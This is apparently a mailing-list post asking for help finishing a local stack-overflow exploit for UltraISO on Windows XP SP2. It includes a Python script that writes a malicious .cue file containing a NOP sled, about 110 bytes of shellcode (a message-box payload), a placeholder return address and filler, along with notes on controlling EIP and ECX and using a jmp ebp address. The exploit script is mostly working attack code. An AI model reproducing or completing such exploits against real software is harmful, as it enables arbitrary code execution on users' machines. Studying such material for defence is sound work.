Help developing exploit

[KaCo678 () aol com]

Hi i was wondering if you would able to help.//I recently found a stack over flow in Ultra iso and was trying to write 
a local exploit for it..But im able to find the address where my nop sled is and every thing ive tried hasnt 
worked..And well as you seam to be a well respected member of the community you might be able to help me...Ive asked a 
few people for help with this one,,But still no further forward..Ill explain the best i can..Im able to control the ecx 
register and eip ..I attach aolly dbg and open the cue file..And the program crashes my eip points to 90909090 nop sled 
lol then i press shift + f9 and then i can write any thing i want to the eip so for testing i wrote 41424344 which then 
wrote to the eip and ecx register..At 3299 bytes then the 4 bytes to write to the registers..Ive provided a little test 
script..Its a mess but its just for testing m8..also worth noting that we still have to actually fill the rest of the 
file ..So altogether we have 5004 bytes to th
 e file..I hope im making sence i was guna use bouncing shared library's method..But not sure i changed the eip to the 
address of 0x7C80C75B jmp ebp as my nops where in there some where...Ive wrote a python script im using to test it 
...Also if you do take a look you will need to create a fake bin file in the same directory..Any help would be great 
thnx for your time.

#!/usr/bin/python
###

import sys
import struct
import time

head_file =     "\x46\x49\x4c\x45\x20\x22" #Header of file

buffer1 =       "\x90" * 4000 #4000  nops

nop =           "\x90" * 189 #189 nops

shell =     "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" # 110 bytes shell code
shell +=    "\x77\x1d\x80\x7c"    
shell +=    "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
shell +=    "\x28\xac\x80\x7c"   
shell +=    "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"
shell +=    "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"
shell +=    "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"
shell +=    "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"
shell +=    "\xff\x4f\x6d\x65\x67\x61\x37\x4e"

fuck =          "\x90" * 2 #lost 2 bytes some where made it up lol
 
offset =        "\x41\x42\x43\x44" 

buffer2 =       "\x45" * 701  #fill the rest of the file with junk
 
Head_end =     "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20" #end of file.
Head_end +=    "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32"
Head_end +=    "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31"
Head_end +=    "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"

cue_file = open("1.cue","wb")

cue_file.write(head_file + buffer1 + nop + shell + fuck + offset + buffer2 + Head_end)

cue_file.close()

Im very confused at the moment as a few people have told me a few ways to exploit this lol..But im still learning..I 
was wondering could i just not point my eip to my nop sled..So my shell code gets executed..Im working with windows xp 
sp2/..Just cant seam to get to the adress of my nop code/